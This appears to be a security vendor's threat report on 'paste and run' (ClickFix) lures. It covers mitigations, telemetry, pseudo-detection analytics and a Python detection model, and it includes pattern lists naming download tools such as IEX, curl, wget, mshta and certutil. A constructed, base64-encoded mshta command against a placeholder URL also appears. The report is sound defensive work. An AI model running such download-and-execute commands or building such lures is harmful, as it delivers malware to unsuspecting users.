
In many ways, 2025 was the year of a social engineering attack known as “ClickFix” or “paste and run” that begins by tricking users into copying and pasting malicious code.
Attacks leveraging malicious copy and paste can take several forms, but at its core the technique relies on a user copying and pasting code into their system’s command-line interface, usually prompted by a CAPTCHA-style message or a “fix” request, so that the adversary gains execution. While this technique goes by several names—including ClickFix and fakeCAPTCHA—Red Canary Intelligence uses the term “paste and run” to describe these attacks internally.
This technique takes advantage of a user’s digital conditioning—instead of feeling tricked, users believe they’re fixing a technical issue—helping the adversary bypass mitigations designed to protect users and circumventing mechanisms that block malicious actions.
While plenty of threat actors employed this technique in 2024, Red Canary observed paste-and-run attacks increase in scope and scale in 2025. The technique has grown in popularity over the past year because it’s been extremely effective.
Paste and run has quickly become the second most popular initial access vector for cyber attacks, trailing only traditional phishing. This technique, which traditionally downloads follow-on payloads from adversary infrastructure, relies heavily on urgency. The adversary is trying to entice the user into verifying or fixing something by typing a command into a terminal, run dialog box, or PowerShell. The lures can often feel time-sensitive and users may feel like they need to act fast to solve the problem.
Red Canary has seen lures take several forms, including ones in which:
In most scenarios, once users interact with the Fix or Verify button in the lure, the button covertly copies an obfuscated PowerShell command to the clipboard and presents the user with “verification steps.” These typically consist of pressing a shortcut to open the Windows Run dialog, pasting the unknowingly copied PowerShell command, and pressing Enter. By following the “verification steps,” the user inadvertently runs the command, which in turn reaches out to adversary infrastructure and downloads malware or tools.
Over the last year, Red Canary has detected adversaries leveraging this technique to deliver a wide range of threats, including but not limited to:
Given how successful they’ve been, it shouldn’t be a surprise that paste-and-run lures have reportedly taken other forms as well, including fake error messages generated by malicious phishing attachments and fake Windows Update screens.
A popular paste-and-run variant seen in 2025 called “FileFix” relies on leveraging the Windows File Explorer address bar to execute commands. KongTuke, a traffic distribution system (TDS) that leverages compromised WordPress sites and the seventh most prevalent threat we observed last year, used both the fakeCAPTCHA and the FileFix version of paste and run in 2025.
While paste-and-run campaigns have largely affected Windows machines, they can also pose a risk to other operating systems. Some adversaries have used lures designed specifically for macOS users that encourage the user to open Spotlight, then macOS Terminal, to execute malicious commands. For instance, in 2025, adversaries created fake websites mimicking trusted macOS developer tools like Homebrew to spread Odyssey and Atomic Stealer. These sites prompt users to copy and paste seemingly benign installation commands into Terminal; the commands secretly download and execute the stealer.
One mitigation strategy is to ensure users are educated about how adversaries take advantage of their digital conditioning. Specifically, organizations should familiarize users with the forms that paste-and-run lures can take, including being presented with unexpected prompts to verify their humanity, update software, or fix an error by opening the terminal, PowerShell, or a run dialog box.
Users should know that no legitimate process will prompt them to press shortcuts such as Windows+R or Windows+X and then paste (Ctrl + V) unknown scripts or commands.
Another mitigation strategy for the Windows version of paste and run is to implement a Group Policy Object (GPO) disabling access to the Run dialog as well as Windows hotkeys, preventing paste and run’s use of Windows+R or Windows+X, as well as paste (Ctrl + V).
While it could be difficult to implement at scale, organizations could also disable cmd.exe and powershell.exe execution for standard users, though due to the popularity and utility of these tools, this strategy does not appear to have been widely adopted by enterprises. It’s worth noting that disabling cmd.exe and powershell.exe could also affect system functionality, as many legitimate Windows processes and third-party applications use them.
Note: The visibility sections in this report are mapped to MITRE ATT&CK data components.
Despite being one of the newer MITRE techniques—Malicious Copy and Paste was added to the MITRE ATT&CK Framework in April 2025—there are a handful of relevant data sources. Detection revolves around monitoring the destination of what’s being pasted and the ensuing execution of said code, along with any potential precursors.
This is the most direct data source. When a user pastes a command into a terminal (cmd.exe, powershell.exe, bash), it results in a command execution event.
The execution of a pasted command will often result in the creation of new processes (e.g., powershell.exe launching curl.exe, or a JavaScript payload in a browser console launching a new process via WMI or similar methods).
Monitoring network connection creation and content analysis can help detect any secondary payloads being downloaded by the executed command (e.g., using curl or wget) and command and control (C2) communications.
Monitoring for access to or modification of the clipboard can detect the initial injection of a malicious command.
The majority of paste-and-run attacks add a malicious entry to the RunMRU (most recently used) registry key. Monitoring RunMRU, which logs commands entered into the Windows Run dialog box (Win+R), can yield telemetry as well.
For command execution, administrators should examine the entire command-line string for patterns involving the following:
Invoke-Expression
IEX
wget
curl
mshta.exe
regsvr32.exe
certutil.exe -decode
The parent process will be a shell or terminal (cmd.exe, powershell.exe, pwsh.exe, bash.exe, WindowsTerminal.exe).
Regarding process creation, defenders should monitor for the creation of suspicious processes, particularly unusual process trees in which a terminal spawns unexpected child processes, e.g., powershell.exe spawning rundll32.exe or mshta.exe.
The most effective detection analytics for malicious copy and paste will combine suspicious command-line arguments and process trees originating from interactive shells or browser processes.
The following pseudo-detection analytic looks for instances of powershell.exe executing an encoded command, establishing external network connections, and writing an executable to disk. These kinds of encoded commands are used by a number of threats, including paste and run:
process == (powershell.exe)
&&
deobfuscated_command_includes (' -e ' || ' -ec ' || ' -en ' || ' -enc ' || ' -enco ' || ' -encod ' || ' -encode ' || ' -encoded ' || ' -encodedc ' || ' -encodedco ' || ' -encodedcom ' || ' -encodedcomm ' || ' -encodedcomma ' || ' -encodedcomman ')
&&
has_external_netconn
&&
file_creation_includes ('exe')
The following pseudo-detection analytic identifies explorer spawning msiexec with a command line containing a remote address. This could be leveraged to download a legitimate MSI file, but has also been used by threats like paste and run/fakeCAPTCHA to download remotely hosted malicious scripts and code.
process_parent == (explorer.exe)
&&
process == (msiexec)
&&
command_includes ('http:' || 'https:')
mshta utility to make external network connections
Red Canary has detected the information stealer LummaC2 delivered as a payload via paste-and-run attacks. In these, the PowerShell command leverages Mshta to download and execute a malicious payload from a command and control server. This continues to be one of our easiest and highest-converting detection analytics.
process == ('mshta')
&&
command_includes ('http:' || 'https:')
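As an added example (not Red Canary’s code or a query from any product), here is a Python model of the three analytics above together with the command-line pattern list and the RunMRU check from the visibility section; it decodes -e/-enc payloads before matching, so a lure’s base64 cannot hide mshta or a URL from the string checks. ProcessEvent, its field names, the analytic labels and the example.invalid URLs are assumptions, and the base64 sample is constructed.

```python
import base64
import re
from dataclasses import dataclass
# Every abbreviation of -EncodedCommand listed in the first analytic, plus the full spelling.
ENCODED_FLAGS = {"-" + "encodedcommand"[:n] for n in range(1, 15)}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash.exe", "windowsterminal.exe"}
REMOTE = re.compile(r"https?:", re.I)
# The command-line patterns the report lists (Invoke-Expression, IEX, wget, curl, ...).
LOLBIN = re.compile(r"\b(invoke-expression|iex|wget|curl|mshta|regsvr32|certutil(?:\.exe)?\s+-decode)\b", re.I)
# Constructed sample: the kind of command a paste-and-run lure hides behind -e (reserved TLD).
SAMPLE_B64 = base64.b64encode("mshta https://example.invalid/x".encode("utf-16-le")).decode()

@dataclass
class ProcessEvent:  # hypothetical, minimal process-telemetry record (field names are assumed)
    process: str
    parent: str
    command_line: str
    external_netconn: bool = False
    files_created: tuple = ()

def deobfuscate(cmd: str) -> str:
    """Append the decoded -e/-enc/... payload (base64 of UTF-16LE) so checks see the real PowerShell."""
    toks = cmd.split()
    for flag, payload in zip(toks, toks[1:]):
        if flag.lower() in ENCODED_FLAGS:
            try:
                return cmd + " " + base64.b64decode(payload).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                break  # not valid base64/UTF-16LE: fall through with the raw command line
    return cmd

def evaluate(ev: ProcessEvent) -> list[str]:
    """Return the names of the report's analytics that fire on one process event."""
    proc, parent, cmd = ev.process.lower(), ev.parent.lower(), deobfuscate(ev.command_line)
    encoded = bool({t.lower() for t in ev.command_line.split()} & ENCODED_FLAGS)
    remote = REMOTE.search(cmd) is not None
    hits = []
    if (proc == "powershell.exe" and encoded and ev.external_netconn
            and any(f.lower().endswith(".exe") for f in ev.files_created)):
        hits.append("powershell_encoded_netconn_exe_write")
    if parent == "explorer.exe" and proc.startswith("msiexec") and remote:
        hits.append("explorer_msiexec_remote")
    if proc.startswith("mshta") and remote:
        hits.append("mshta_remote")
    if parent in SHELLS and LOLBIN.search(cmd):
        hits.append("shell_child_lolbin_pattern")
    return hits

def suspicious_runmru(values: dict) -> list[str]:
    """RunMRU entries, newest first per MRUList, minus the literal '\\1' suffix, that decode to a LOLBIN or URL."""
    entries = [values[k].removesuffix("\\1") for k in values.get("MRUList", "") if k in values]
    return [e for e in entries if LOLBIN.search(deobfuscate(e)) or REMOTE.search(deobfuscate(e))]
```

Feed evaluate() each process-start record from your EDR export and suspicious_runmru() the value map of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; a Run-dialog entry that only looks like "powershell -e <blob>" is surfaced because the decoded payload, not the blob, is what gets matched.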
Start testing your defenses against Malicious Copy and Paste using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.
The following tests offer a great starting point for organizations to validate their detection coverage for the Malicious Copy and Paste technique:
T1566.002 – Phishing: Spearphishing Link Atomic Test #1 – Paste-and-run technique
This atomic test simulates the paste-and-run technique where users are tricked into running malicious PowerShell commands by automating the Win+R command to open the Run dialog and input encoded PowerShell to execute calc.exe.
T1204.002 – User Execution: Malicious File Atomic Test #12 – ClickFix Campaign – Abuse RunMRU to launch mshta via PowerShell
This atomic test simulates a paste-and-run campaign by adding a malicious entry to the RunMRU registry key that launches mshta.exe with a remote payload. This technique relies on user interaction (Win+R + Enter) to trigger execution.
Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:
Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.